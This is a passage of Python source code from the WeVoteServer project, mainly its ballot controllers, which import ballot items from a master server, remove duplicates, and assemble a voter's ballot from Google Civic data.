' "ballot_caveat": string,\n' \
' "is_from_substituted_address": boolean,\n' \
' "is_from_test_ballot": boolean,\n' \
' "ballot_item_list": list\n' \
' [\n' \
' "ballot_item_display_name": string,\n' \
' "voter_id": integer,\n' \
' "google_civic_election_id": integer,\n' \
' "google_ballot_placement": integer,\n' \
' "local_ballot_order": integer,\n' \
' "kind_of_ballot_item": string (CANDIDATE, MEASURE),\n' \
' "id": integer,\n' \
' "we_vote_id": string,\n' \
' "candidate_list": list\n' \
' [\n' \
' "id": integer,\n' \
' "we_vote_id": string,\n' \
' "ballot_item_display_name": string,\n' \
' "candidate_photo_url": string,\n' \
' "party": string,\n' \
' "order_on_ballot": integer,\n' \
' ],\n' \
' ],\n' \
'}'
template_values = {
'api_name': 'voterAddressSave',
'api_slug': 'voterAddressSave',
'api_introduction':
"Save or create an address for the current voter. Then return the same results as we return with "
"voterBallotItemsRetrieve.",
'try_now_link': 'apis_v1:voterAddressSaveView',
'try_now_link_variables_dict': try_now_link_variables_dict,
'url_root': url_root,
'get_or_post': 'GET',
'required_query_parameter_list': required_query_parameter_list,
'optional_query_parameter_list': optional_query_parameter_list,
'api_response': api_response,
'api_response_notes':
"",
'potential_status_codes_list': potential_status_codes_list,
}
return template_values
```
#### File: WeVoteServer/ballot/controllers.py
```python
from .models import BallotItemListManager, BallotItemManager, BallotReturnedListManager, BallotReturnedManager, \
CANDIDATE, copy_existing_ballot_items_from_stored_ballot, OFFICE, MEASURE, \
VoterBallotSaved, VoterBallotSavedManager
from candidate.models import CandidateCampaignListManager
from config.base import get_environment_variable
from datetime import datetime
from django.contrib import messages
from election.models import ElectionManager
from exception.models import handle_exception
from import_export_google_civic.controllers import voter_ballot_items_retrieve_from_google_civic_for_api
import json
from measure.models import ContestMeasureList
from office.models import ContestOfficeListManager
from polling_location.models import PollingLocationManager
import requests
from voter.models import BALLOT_ADDRESS, VoterAddressManager, \
VoterDeviceLinkManager
import wevote_functions.admin
from wevote_functions.functions import convert_to_int, positive_value_exists
logger = wevote_functions.admin.get_logger(__name__)
GOOGLE_CIVIC_API_KEY = get_environment_variable("GOOGLE_CIVIC_API_KEY")
WE_VOTE_API_KEY = get_environment_variable("WE_VOTE_API_KEY")
BALLOT_ITEMS_SYNC_URL = get_environment_variable("BALLOT_ITEMS_SYNC_URL")
BALLOT_RETURNED_SYNC_URL = get_environment_variable("BALLOT_RETURNED_SYNC_URL")
def ballot_items_import_from_master_server(request, google_civic_election_id):
"""
Get the json data, and either create new entries or update existing
:return:
"""
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading Ballot Items from We Vote Master servers")
logger.info("Loading Ballot Items from We Vote Master servers")
request = requests.get(BALLOT_ITEMS_SYNC_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
"format": 'json',
"google_civic_election_id": google_civic_election_id,
})
structured_json = json.loads(request.text)
results = filter_ballot_items_structured_json_for_local_duplicates(structured_json)
filtered_structured_json = results['structured_json']
duplicates_removed = results['duplicates_removed']
import_results = ballot_items_import_from_structured_json(filtered_structured_json)
import_results['duplicates_removed'] = duplicates_removed
return import_results
def ballot_returned_import_from_master_server(request, google_civic_election_id):
"""
Get the json data, and either create new entries or update existing
:return:
"""
# Request json file from We Vote servers
messages.add_message(request, messages.INFO, "Loading Ballot Returned entries (saved ballots, specific to one "
"location) from We Vote Master servers")
logger.info("Loading Ballot Returned entries (saved ballots, specific to one location) from We Vote Master servers")
request = requests.get(BALLOT_RETURNED_SYNC_URL, params={
"key": WE_VOTE_API_KEY, # This comes from an environment variable
"format": 'json',
"google_civic_election_id": google_civic_election_id,
})
structured_json = json.loads(request.text)
results = filter_ballot_returned_structured_json_for_local_duplicates(structured_json)
filtered_structured_json = results['structured_json']
duplicates_removed = results['duplicates_removed']
import_results = ballot_returned_import_from_structured_json(filtered_structured_json)
import_results['duplicates_removed'] = duplicates_removed
return import_results
def filter_ballot_items_structured_json_for_local_duplicates(structured_json):
"""
With this function, we remove ballot_items that seem to be duplicates, but have different we_vote_id's.
We do not check to see if we have a matching office or measure in the database this routine --
that is done elsewhere.
:param structured_json:
:return:
"""
duplicates_removed = 0
filtered_structured_json = []
ballot_item_list_manager = BallotItemListManager()
for one_ballot_item in structured_json:
ballot_item_display_name = one_ballot_item['ballot_item_display_name'] \
if 'ballot_item_display_name' in one_ballot_item else ''
google_civic_election_id = one_ballot_item['google_civic_election_id'] \
if 'google_civic_election_id' in one_ballot_item else ''
polling_location_we_vote_id = one_ballot_item['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_item else ''
contest_office_we_vote_id = one_ballot_item['contest_office_we_vote_id'] \
if 'contest_office_we_vote_id' in one_ballot_item else ''
contest_measure_we_vote_id = one_ballot_item['contest_measure_we_vote_id'] \
if 'contest_measure_we_vote_id' in one_ballot_item else ''
# Check to see if there is an entry that matches in all critical ways, minus the
# contest_office_we_vote_id or contest_measure_we_vote_id. That is, an entry for a
# google_civic_election_id + polling_location_we_vote_id that has the same ballot_item_display_name,
# but different contest_office_we_vote_id or contest_measure_we_vote_id
results = ballot_item_list_manager.retrieve_possible_duplicate_ballot_items(
ballot_item_display_name, google_civic_election_id, polling_location_we_vote_id, contest_office_we_vote_id,
contest_measure_we_vote_id)
if results['ballot_item_list_found']:
# There seems to be a duplicate already in this database using a different we_vote_id
duplicates_removed += 1
else:
filtered_structured_json.append(one_ballot_item)
ballot_items_results = {
'success': True,
'status': "FILTER_BALLOT_ITEMS_FOR_DUPLICATES_PROCESS_COMPLETE",
'duplicates_removed': duplicates_removed,
'structured_json': filtered_structured_json,
}
return ballot_items_results
def filter_ballot_returned_structured_json_for_local_duplicates(structured_json):
"""
With this function, we remove ballot_returned entries that seem to be duplicates,
but have different polling_location_we_vote_id's.
We do not check to see if we have a local entry for polling_location_we_vote_id -- that is done elsewhere.
:param structured_json:
:return:
"""
duplicates_removed = 0
filtered_structured_json = []
ballot_returned_list_manager = BallotReturnedListManager()
for one_ballot_returned in structured_json:
polling_location_we_vote_id = one_ballot_returned['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_returned else ''
google_civic_election_id = \
one_ballot_returned['google_civic_election_id'] if 'google_civic_election_id' in one_ballot_returned else ''
normalized_line1 = one_ballot_returned['normalized_line1'] if 'normalized_line1' in one_ballot_returned else ''
normalized_zip = one_ballot_returned['normalized_zip'] if 'normalized_zip' in one_ballot_returned else ''
# Check to see if there is an entry that matches in all critical ways, minus the polling_location_we_vote_id
results = ballot_returned_list_manager.retrieve_possible_duplicate_ballot_returned(
google_civic_election_id, normalized_line1, normalized_zip, polling_location_we_vote_id)
if results['ballot_returned_list_found']:
# There seems to be a duplicate already in this database using a different we_vote_id
duplicates_removed += 1
else:
filtered_structured_json.append(one_ballot_returned)
ballot_returned_results = {
'success': True,
'status': "FILTER_BALLOT_RETURNED_ITEMS_FOR_DUPLICATES_PROCESS_COMPLETE",
'duplicates_removed': duplicates_removed,
'structured_json': filtered_structured_json,
}
return ballot_returned_results
def ballot_items_import_from_structured_json(structured_json):
"""
This pathway in requires a we_vote_id, and is not used when we import from Google Civic
:param structured_json:
:return:
"""
ballot_item_manager = BallotItemManager()
ballot_items_saved = 0
ballot_items_updated = 0
ballot_items_not_processed = 0
for one_ballot_item in structured_json:
polling_location_we_vote_id = one_ballot_item['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_item else ''
google_civic_election_id = \
one_ballot_item['google_civic_election_id'] if 'google_civic_election_id' in one_ballot_item else ''
contest_office_we_vote_id = one_ballot_item['contest_office_we_vote_id'] \
if 'contest_office_we_vote_id' in one_ballot_item else ''
contest_measure_we_vote_id = one_ballot_item['contest_measure_we_vote_id'] \
if 'contest_measure_we_vote_id' in one_ballot_item else ''
if positive_value_exists(polling_location_we_vote_id) and positive_value_exists(google_civic_election_id) \
and (positive_value_exists(contest_office_we_vote_id) or
positive_value_exists(contest_measure_we_vote_id)):
# We check to make sure we have a local copy of this polling_location, contest_office or contest_measure
# in ballot_item_manager.update_or_create_ballot_item_for_polling_location
proceed_to_update_or_create = True
else:
proceed_to_update_or_create = False
if proceed_to_update_or_create:
ballot_item_display_name = one_ballot_item['ballot_item_display_name'] \
if 'ballot_item_display_name' in one_ballot_item else ''
measure_subtitle = one_ballot_item['measure_subtitle'] if 'measure_subtitle' in one_ballot_item else 0
google_ballot_placement = one_ballot_item['google_ballot_placement'] \
if 'google_ballot_placement' in one_ballot_item else 0
local_ballot_order = one_ballot_item['local_ballot_order'] \
if 'local_ballot_order' in one_ballot_item else ''
contest_office_id = 0
contest_measure_id = 0
results = ballot_item_manager.update_or_create_ballot_item_for_polling_location(
polling_location_we_vote_id, google_civic_election_id, google_ballot_placement,
ballot_item_display_name, measure_subtitle, local_ballot_order,
contest_office_id, contest_office_we_vote_id,
contest_measure_id, contest_measure_we_vote_id)
else:
ballot_items_not_processed += 1
results = {
'success': False,
'status': 'Required value missing, cannot update or create'
}
if results['success']:
if results['new_ballot_item_created']:
ballot_items_saved += 1
else:
ballot_items_updated += 1
else:
ballot_items_not_processed += 1
ballot_items_results = {
'success': True,
'status': "ballot_items_IMPORT_PROCESS_COMPLETE",
'saved': ballot_items_saved,
'updated': ballot_items_updated,
'not_processed': ballot_items_not_processed,
}
return ballot_items_results
def ballot_returned_import_from_structured_json(structured_json):
"""
This pathway in requires a we_vote_id, and is not used when we import from Google Civic
:param structured_json:
:return:
"""
ballot_returned_manager = BallotReturnedManager()
polling_location_manager = PollingLocationManager()
ballot_returned_saved = 0
ballot_returned_updated = 0
ballot_returned_not_processed = 0
for one_ballot_returned in structured_json:
google_civic_election_id = \
one_ballot_returned['google_civic_election_id'] if 'google_civic_election_id' in one_ballot_returned else 0
polling_location_we_vote_id = one_ballot_returned['polling_location_we_vote_id'] \
if 'polling_location_we_vote_id' in one_ballot_returned else ''
# I don't think we expect voter_id to be other than 0 since we only import ballot_returned entries from
# polling_locations
voter_id = one_ballot_returned['voter_id'] if 'voter_id' in one_ballot_returned else 0
if positive_value_exists(google_civic_election_id) and (positive_value_exists(polling_location_we_vote_id) or
positive_value_exists(voter_id)):
# Make sure we have a local polling_location
results = polling_location_manager.retrieve_polling_location_by_id(0, polling_location_we_vote_id)
if results['polling_location_found']:
proceed_to_update_or_create = True
else:
# We don't want to save a ballot_returned entry if the polling location wasn't stored locally
proceed_to_update_or_create = False
else:
proceed_to_update_or_create = False
if proceed_to_update_or_create:
election_date = one_ballot_returned['election_date'] if 'election_date' in one_ballot_returned else False
election_description_text = one_ballot_returned['election_description_text'] \
if 'election_description_text' in one_ballot_returned else False
latitude = one_ballot_returned['latitude'] if 'latitude' in one_ballot_returned else False
longitude = one_ballot_returned['longitude'] if 'longitude' in one_ballot_returned else False
normalized_city = one_ballot_returned['normalized_city'] \
if 'normalized_city' in one_ballot_returned else False
normalized_line1 = one_ballot_returned['normalized_line1'] \
if 'normalized_line1' in one_ballot_returned else False
normalized_line2 = one_ballot_returned['normalized_line2'] \
if 'normalized_line2' in one_ballot_returned else False
normalized_state = one_ballot_returned['normalized_state'] \
if 'normalized_state' in one_ballot_returned else False
normalized_zip = one_ballot_returned['normalized_zip'] \
if 'normalized_zip' in one_ballot_returned else False
text_for_map_search = one_ballot_returned['text_for_map_search'] \
if 'text_for_map_search' in one_ballot_returned else False
results = ballot_returned_manager.update_or_create_ballot_returned(
polling_location_we_vote_id, voter_id, google_civic_election_id, election_date,
election_description_text, latitude, longitude,
normalized_city, normalized_line1, normalized_line2, normalized_state,
normalized_zip, text_for_map_search)
else:
ballot_returned_not_processed += 1
results = {
'success': False,
}
if results['success']:
if results['new_ballot_returned_created']:
ballot_returned_saved += 1
else:
ballot_returned_updated += 1
else:
ballot_returned_not_processed += 1
status = "BALLOT_RETURNED_IMPORT_PROCESS_COMPLETED"
ballot_returned_results = {
'success': True,
'status': status,
'saved': ballot_returned_saved,
'updated': ballot_returned_updated,
'not_processed': ballot_returned_not_processed,
}
return ballot_returned_results
def figure_out_google_civic_election_id_voter_is_watching(voter_device_id):
status = ''
# We zero out this value since we will never have this coming in for this function
google_civic_election_id = 0
# We retrieve voter_device_link
voter_device_link_manager = VoterDeviceLinkManager()
voter_device_link_results = voter_device_link_manager.retrieve_voter_device_link(voter_device_id)
if not voter_device_link_results['voter_device_link_found']:
status += "VALID_VOTER_DEVICE_ID_MISSING: " + voter_device_link_results['status']
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'voter_device_link_found': False,
'voter_address_object_found': False,
'voter_ballot_saved_found': False,
'google_civic_election_id': 0,
}
return results
voter_device_link = voter_device_link_results['voter_device_link']
voter_id = voter_device_link.voter_id
if not positive_value_exists(voter_id):
status += " " + "VALID_VOTER_ID_MISSING"
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'voter_device_link_found': False,
'voter_address_object_found': False,
'voter_ballot_saved_found': False,
'google_civic_election_id': 0,
}
return results
voter_address_manager = VoterAddressManager()
voter_address_id = 0
address_type = BALLOT_ADDRESS
voter_address_results = voter_address_manager.retrieve_address(voter_address_id, voter_id, address_type)
status += " " + voter_address_results['status']
if not positive_value_exists(voter_address_results['voter_address_has_value']):
# If there isn't an address with a value, then there won't be a voter_ballot_saved_found
results = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'voter_device_link_found': False,
'voter_address_object_found': voter_address_results['voter_address_found'],
'voter_ballot_saved_found': False,
'google_civic_election_id': 0,
}
return results
voter_address = voter_address_results['voter_address']
# This routine finds a ballot saved for this voter
choose_election_results = choose_election_from_existing_data(voter_device_link, google_civic_election_id,
voter_address)
status += " " + choose_election_results['status']
results = {
'status': status,
'success': choose_election_results['success'],
'voter_device_id': voter_device_id,
'voter_device_link_found': True,
'voter_address_object_found': voter_address_results['voter_address_found'],
'voter_ballot_saved_found': choose_election_results['voter_ballot_saved_found'],
'google_civic_election_id': choose_election_results['google_civic_election_id'],
}
return results
def voter_ballot_items_retrieve_for_api(voter_device_id, google_civic_election_id):
status = ''
# We retrieve voter_device_link
voter_device_link_manager = VoterDeviceLinkManager()
voter_device_link_results = voter_device_link_manager.retrieve_voter_device_link(voter_device_id)
if not voter_device_link_results['voter_device_link_found']:
status += "VALID_VOTER_DEVICE_ID_MISSING "
error_json_data = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': google_civic_election_id,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
voter_device_link = voter_device_link_results['voter_device_link']
voter_id = voter_device_link.voter_id
if not positive_value_exists(voter_id):
status += " " + "VALID_VOTER_ID_MISSING"
error_json_data = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': google_civic_election_id,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
voter_address_manager = VoterAddressManager()
voter_address_id = 0
address_type = BALLOT_ADDRESS
voter_address_results = voter_address_manager.retrieve_address(voter_address_id, voter_id, address_type)
status += " " + voter_address_results['status']
if not positive_value_exists(voter_address_results['voter_address_has_value']):
error_json_data = {
'status': status,
'success': voter_address_results['success'],
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': 0,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
voter_address = voter_address_results['voter_address']
results = choose_election_and_prepare_ballot_data(voter_device_link, google_civic_election_id, voter_address)
status += " " + results['status']
if not results['voter_ballot_saved_found']:
if positive_value_exists(voter_address.text_for_map_search):
ballot_caveat = "We could not find a ballot near '{text_for_map_search}'.".format(
text_for_map_search=voter_address.text_for_map_search)
else:
ballot_caveat = "Please save your address so we can find your ballot."
error_json_data = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': 0,
'text_for_map_search': voter_address.text_for_map_search,
'substituted_address_nearby': '',
'ballot_caveat': ballot_caveat,
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
google_civic_election_id = results['google_civic_election_id']
voter_ballot_saved = results['voter_ballot_saved']
# Update voter_device_link
if voter_device_link.google_civic_election_id != google_civic_election_id:
voter_device_link_manager.update_voter_device_link_with_election_id(voter_device_link, google_civic_election_id)
# Update voter_address to include matching google_civic_election_id and voter_ballot_saved entry
if positive_value_exists(google_civic_election_id):
voter_address.google_civic_election_id = google_civic_election_id
voter_address_manager.update_existing_voter_address_object(voter_address)
# Get and return the ballot_item_list
results = voter_ballot_items_retrieve_for_one_election_for_api(voter_device_id, voter_id,
google_civic_election_id)
if not positive_value_exists(voter_ballot_saved.election_description_text) \
or not positive_value_exists(voter_ballot_saved.election_date_text()):
try:
election_manager = ElectionManager()
election_results = election_manager.retrieve_election(google_civic_election_id)
if election_results['election_found']:
election = election_results['election']
if not positive_value_exists(voter_ballot_saved.election_description_text):
voter_ballot_saved.election_description_text = election.election_name
if not positive_value_exists(voter_ballot_saved.election_date_text()):
voter_ballot_saved.election_date = \
datetime.strptime(election.election_day_text, "%Y-%m-%d").date()
voter_ballot_saved.save()
except Exception as e:
status += "Failed to update election_name"
status += " " + results['status']
json_data = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'ballot_found': True,
'ballot_item_list': results['ballot_item_list'],
'google_civic_election_id': google_civic_election_id,
'election_name': voter_ballot_saved.election_description_text,
'election_date': voter_ballot_saved.election_date_text(),
'text_for_map_search': voter_ballot_saved.original_text_for_map_search,
'substituted_address_nearby': voter_ballot_saved.substituted_address_nearby,
'ballot_caveat': voter_ballot_saved.ballot_caveat(),
'is_from_substituted_address': voter_ballot_saved.is_from_substituted_address,
'is_from_test_ballot': voter_ballot_saved.is_from_test_ballot,
}
return json_data
status += " " + "NO_VOTER_BALLOT_SAVED_FOUND"
error_json_data = {
'status': status,
'success': True,
'voter_device_id': voter_device_id,
'ballot_found': False,
'ballot_item_list': [],
'google_civic_election_id': 0,
'text_for_map_search': '',
'substituted_address_nearby': '',
'ballot_caveat': '',
'is_from_substituted_address': False,
'is_from_test_ballot': False,
}
return error_json_data
def choose_election_and_prepare_ballot_data(voter_device_link, google_civic_election_id, voter_address):
voter_id = voter_device_link.voter_id
if not positive_value_exists(voter_id):
results = {
'status': "VOTER_NOT_FOUND_FROM_VOTER_DEVICE_ID",
'success': False,
'google_civic_election_id': google_civic_election_id,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
# This routine finds a ballot saved for this voter
results = choose_election_from_existing_data(voter_device_link, google_civic_election_id, voter_address)
if results['voter_ballot_saved_found']:
# Return voter_ballot_saved
return results
# If here, then we need to either:
# 1) Get ballot data from Google Civic for the actual VoterAddress
# 2) Copy ballot data from a nearby address, previously retrieved from Google Civic and cached within We Vote, or
# generated within We Vote (google_civic_election_id >= 1000000
# 3) Get test ballot data from Google Civic
results = generate_ballot_data(voter_device_link, voter_address)
if results['voter_ballot_saved_found']:
# Return voter_ballot_saved
return results
results = {
'status': "BALLOT_NOT_FOUND_OR_GENERATED-SUFFICIENT_ADDRESS_PROBABLY_MISSING",
'success': True,
'google_civic_election_id': google_civic_election_id,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
def generate_ballot_data(voter_device_link, voter_address):
voter_device_id = voter_device_link.voter_device_id
voter_id = voter_device_link.voter_id
voter_ballot_saved_manager = VoterBallotSavedManager()
if not positive_value_exists(voter_id):
results = {
'status': "VOTER_NOT_FOUND_FROM_VOTER_DEVICE_ID",
'success': False,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': VoterBallotSaved()
}
return results
# If a partial address doesn't exist, exit because we can't generate a ballot without an address
if not positive_value_exists(voter_address.text_for_map_search):
results = {
'status': "VOTER_ADDRESS_BLANK",
'success': True,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
# 1) Get ballot data from Google Civic for the actual VoterAddress
text_for_map_search = voter_address.text_for_map_search
use_test_election = False
results = voter_ballot_items_retrieve_from_google_civic_for_api(voter_device_id, text_for_map_search,
use_test_election)
if results['google_civic_election_id']:
is_from_substituted_address = False
substituted_address_nearby = ''
is_from_test_address = False
# We update the voter_address with this google_civic_election_id outside of this function
# Save the meta information for this ballot data
save_results = voter_ballot_saved_manager.create_voter_ballot_saved(
voter_id,
results['google_civic_election_id'],
results['election_date_text'],
results['election_description_text'],
results['text_for_map_search'],
substituted_address_nearby,
is_from_substituted_address,
is_from_test_address
)
results = {
'status': save_results['status'],
'success': save_results['success'],
'google_civic_election_id': save_results['google_civic_election_id'],
'voter_ballot_saved_found': save_results['voter_ballot_saved_found'],
'voter_ballot_saved': save_results['voter_ballot_saved'],
}
return results
# 2) Copy ballot data from a nearby address, previously retrieved from Google Civic and cached within We Vote
copy_results = copy_existing_ballot_items_from_stored_ballot(voter_id, text_for_map_search)
if copy_results['ballot_returned_copied']:
is_from_substituted_address = True
is_from_test_address = False
save_results = voter_ballot_saved_manager.create_voter_ballot_saved(
voter_id,
copy_results['google_civic_election_id'],
copy_results['election_date_text'],
copy_results['election_description_text'],
text_for_map_search,
copy_results['substituted_address_nearby'],
is_from_substituted_address,
is_from_test_address
)
results = {
'status': save_results['status'],
'success': save_results['success'],
'google_civic_election_id': save_results['google_civic_election_id'],
'voter_ballot_saved_found': save_results['voter_ballot_saved_found'],
'voter_ballot_saved': save_results['voter_ballot_saved'],
}
return results
# 3) Get test ballot data from Google Civic
use_test_election = True
results = voter_ballot_items_retrieve_from_google_civic_for_api(voter_device_id, text_for_map_search,
use_test_election)
if results['google_civic_election_id']:
is_from_substituted_address = False
substituted_address_nearby = ''
is_from_test_address = True
# Since this is a test address, we don't want to save the google_civic_election_id (of 2000)
# with the voter_address
save_results = voter_ballot_saved_manager.create_voter_ballot_saved(
voter_id,
results['google_civic_election_id'],
results['election_date_text'],
results['election_description_text'],
results['text_for_map_search'],
substituted_address_nearby,
is_from_substituted_address,
is_from_test_address
)
results = {
'status': save_results['status'],
'success': save_results['success'],
'google_civic_election_id': save_results['google_civic_election_id'],
'voter_ballot_saved_found': save_results['voter_ballot_saved_found'],
'voter_ballot_saved': save_results['voter_ballot_saved'],
}
return results
results = {
'status': "UNABLE_TO_GENERATE_BALLOT_DATA",
'success': True,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None,
}
return results
def choose_election_from_existing_data(voter_device_link, google_civic_election_id, voter_address):
voter_id = voter_device_link.voter_id
voter_ballot_saved_manager = VoterBallotSavedManager()
# If a google_civic_election_id was passed in, then we simply return the ballot that was saved
if positive_value_exists(google_civic_election_id):
voter_ballot_saved_results = voter_ballot_saved_manager.retrieve_voter_ballot_saved_by_voter_id(
voter_id, google_civic_election_id)
if voter_ballot_saved_results['voter_ballot_saved_found']:
voter_ballot_saved = voter_ballot_saved_results['voter_ballot_saved']
results = {
'status': "",
'success': True,
'google_civic_election_id': voter_ballot_saved.google_civic_election_id,
'voter_ballot_saved_found': True,
'voter_ballot_saved': voter_ballot_saved
}
return results
else:
# If here, then we expected a VoterBallotSaved entry for this voter, but didn't find it
pass
if positive_value_exists(voter_device_link.google_civic_election_id):
voter_ballot_saved_results = voter_ballot_saved_manager.retrieve_voter_ballot_saved_by_voter_id(
voter_id, voter_device_link.google_civic_election_id)
if voter_ballot_saved_results['voter_ballot_saved_found']:
voter_ballot_saved = voter_ballot_saved_results['voter_ballot_saved']
results = {
'status': "VOTER_BALLOT_SAVED_FOUND_FROM_VOTER_DEVICE_LINK",
'success': True,
'google_civic_election_id': voter_ballot_saved.google_civic_election_id,
'voter_ballot_saved_found': True,
'voter_ballot_saved': voter_ballot_saved
}
return results
else:
# If here, then we expected a VoterBallotSaved entry, but didn't find it. Unable to repair the data
pass
if voter_address.google_civic_election_id is None:
voter_address_google_civic_election_id = 0
else:
voter_address_google_civic_election_id = voter_address.google_civic_election_id
voter_address_google_civic_election_id = convert_to_int(voter_address_google_civic_election_id)
if positive_value_exists(voter_address_google_civic_election_id) \
and voter_address_google_civic_election_id != 2000:
# If we have already linked an address to a VoterBallotSaved entry, use this
voter_ballot_saved_results = voter_ballot_saved_manager.retrieve_voter_ballot_saved_by_voter_id(
voter_id, voter_address_google_civic_election_id)
if voter_ballot_saved_results['voter_ballot_saved_found']:
voter_ballot_saved = voter_ballot_saved_results['voter_ballot_saved']
results = {
'status': "VOTER_BALLOT_SAVED_FOUND_FROM_VOTER_ADDRESS",
'success': True,
'google_civic_election_id': voter_ballot_saved.google_civic_election_id,
'voter_ballot_saved_found': True,
'voter_ballot_saved': voter_ballot_saved
}
return results
else:
# If here, then we expected a VoterBallotSaved entry, but didn't find it. Unable to repair the data
pass
error_results = {
'status': "VOTER_BALLOT_SAVED_NOT_FOUND_FROM_EXISTING_DATA",
'success': True,
'google_civic_election_id': 0,
'voter_ballot_saved_found': False,
'voter_ballot_saved': None
}
return error_results
def voter_ballot_items_retrieve_for_one_election_for_api(voter_device_id, voter_id, google_civic_election_id):
"""
:param voter_device_id:
:param voter_id:
:param google_civic_election_id: This variable was passed in explicitly so we can
get the ballot items related to that election.
:return:
"""
ballot_item_list_manager = BallotItemListManager()
ballot_item_list = []
ballot_items_to_display = []
try:
results = ballot_item_list_manager.retrieve_all_ballot_items_for_voter(voter_id, google_civic_election_id)
success = results['success']
status = results['status']
ballot_item_list = results['ballot_item_list']
except Exception as e:
status = 'FAILED voter_ballot_items_retrieve. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
success = False
if success:
for ballot_item in ballot_item_list:
if ballot_item.contest_office_we_vote_id:
kind_of_ballot_item = OFFICE
ballot_item_id = ballot_item.contest_office_id
we_vote_id = ballot_item.contest_office_we_vote_id
try:
candidate_list_object = CandidateCampaignListManager()
results = candidate_list_object.retrieve_all_candidates_for_office(ballot_item_id, we_vote_id)
candidates_to_display = []
if results['candidate_list_found']:
candidate_list = results['candidate_list']
for candidate in candidate_list:
# This should match values returned in candidates_retrieve_for_api
one_candidate = {
'id': candidate.id,
'we_vote_id': candidate.we_vote_id,
'ballot_item_display_name': candidate.display_candidate_name(),
'candidate_photo_url': candidate.candidate_photo_url(),
'party': candidate.political_party_display(),
'order_on_ballot': candidate.order_on_ballot,
'kind_of_ballot_item': CANDIDATE,
'twitter_handle': candidate.candidate_twitter_handle,
'twitter_description': candidate.twitter_description,
'twitter_followers_count': candidate.twitter_followers_count,
}
candidates_to_display.append(one_candidate.copy())
except Exception as e:
# status = 'FAILED candidates_retrieve. ' \
# '{error} [type: {error_type}]'.format(error=e.message, error_type=type(e))
candidates_to_display = []
one_ballot_item = {
'ballot_item_display_name': ballot_item.ballot_item_display_name,
'google_civic_election_id': ballot_item.google_civic_election_id,
'google_ballot_placement': ballot_item.google_ballot_placement,
'local_ballot_order': ballot_item.local_ballot_order,
'kind_of_ballot_item': kind_of_ballot_item,
'id': ballot_item_id,
'we_vote_id': we_vote_id,
'candidate_list': candidates_to_display,
}
ballot_items_to_display.append(one_ballot_item.copy())
elif ballot_item.contest_measure_we_vote_id:
kind_of_ballot_item = MEASURE
ballot_item_id = ballot_item.contest_measure_id
we_vote_id = ballot_item.contest_measure_we_vote_id
one_ballot_item = {
'ballot_item_display_name': ballot_item.ballot_item_display_name,
'google_civic_election_id': ballot_item.google_civic_election_id,
'google_ballot_placement': ballot_item.google_ballot_placement,
'local_ballot_order': ballot_item.local_ballot_order,
'measure_subtitle': ballot_item.measure_subtitle,
'kind_of_ballot_item': kind_of_ballot_item,
'id': ballot_item_id,
'we_vote_id': we_vote_id,
}
ballot_items_to_display.append(one_ballot_item.copy())
results = {
'status': 'VOTER_BALLOT_ITEMS_RETRIEVED',
'success': True,
'voter_device_id': voter_device_id,
'ballot_item_list': ballot_items_to_display,
'google_civic_election_id': google_civic_election_id,
}
else:
results = {
'status': status,
'success': False,
'voter_device_id': voter_device_id,
'ballot_item_list': [],
'google_civic_election_id': google_civic_election_id,
}
return results
def ballot_item_options_retrieve_for_api(google_civic_election_id=0):
"""
This function returns a normalized list of candidates and measures so we can pre-populate form fields.
Not specific to one voter.
:param google_civic_election_id:
:return:
"""
status = ""
try:
candidate_list_object = CandidateCampaignListManager()
results = candidate_list_object.retrieve_all_candidates_for_upcoming_election(google_civic_election_id)
candidate_success = results['success']
status += results['status']
candidate_list = results['candidate_list_light']
except Exception as e:
status += 'FAILED ballot_item_options_retrieve_for_api, candidate_list. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
candidate_list = []
candidate_success = False
try:
office_list_object = ContestOfficeListManager()
results = office_list_object.retrieve_all_offices_for_upcoming_election(google_civic_election_id)
office_success = results['success']
status += ' ' + results['status']
office_list = results['office_list_light']
except Exception as e:
status += 'FAILED ballot_item_options_retrieve_for_api, office_list. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
office_list = []
office_success = False
try:
measure_list_object = ContestMeasureList()
results = measure_list_object.retrieve_all_measures_for_upcoming_election(google_civic_election_id)
measure_success = results['success']
status += ' ' + results['status']
measure_list = results['measure_list_light']
except Exception as e:
status += 'FAILED ballot_item_options_retrieve_for_api, measure_list. ' \
'{error} [type: {error_type}]'.format(error=e, error_type=type(e))
handle_exception(e, logger=logger, exception_message=status)
measure_list = []
measure_success = False
ballot_items_to_display = []
if candidate_success and len(candidate_list):
for candidate in candidate_list:
